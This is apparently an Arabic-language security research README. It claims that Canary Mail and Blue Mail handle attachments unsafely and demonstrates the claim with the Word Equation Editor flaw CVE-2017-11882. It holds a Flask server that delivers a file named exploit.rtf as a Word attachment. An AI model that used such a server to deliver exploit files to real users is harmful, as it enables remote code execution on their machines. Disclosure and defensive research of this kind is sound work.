
معالجة غير آمنة للمرفقات عند استخدام Canary Mail أو Blue Mail
المشكلة الأساسية ليست في أن المستخدمين يفتحون مرفقات خبيثة، بل في أن تطبيقات مثل Canary Mail أو Blue Mail توفر ميزة مريحة لكنها غير آمنة لحفظ هذه المرفقات أو فتحها. أعتبر هذا ثغرة أمنية تعرّض المستخدمين للمهاجمين.
لتوضيح الفتح غير الآمن لمرفقات Office Word عبر مربع حوار "فتح باستخدام" أو "حفظ باسم"، تم استخدام الثغرة CVE-2017-11882 في محرر المعادلات لإصدارات Office Word 16 والإصدارات الأقدم.
from flask import Flask, send_file, request
import logging
from datetime import datetime
app = Flask(__name__)
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
@app.before_request
def log_request_info():
logger.info(f'Request: {request.method} {request.url} from {request.remote_addr}')
@app.after_request
def log_response_info(response):
logger.info(f'Response: Status {response.status_code} for {request.url}')
return response
@app.route('/download')
def download_file():
try:
response = send_file('exploit.rtf', mimetype='application/msword', as_attachment=True)
logger.info('File download successful')
return response
except FileNotFoundError:
logger.error('File exploit.rtf not found')
return 'File not found', 404
if __name__ == '__main__':
app.run(debug=False, host='0.0.0.0', port=5000)
احتمالية تنفيذ تعليمات برمجية عن بُعد (RCE) للمستخدمين الذين يستخدمون إصدارات قديمة من برنامج Microsoft Office Word الإصدار 16 والإصدارات الأقدم.
https://github.com/user-attachments/assets/fc99d603-f56f-451b-a9f2-821422feef61
https://github.com/user-attachments/assets/68b638b9-e906-4c78-baae-84a369f807f3
هذا المستودع مخصص للبحث الأمني التعليمي والدفاعي فقط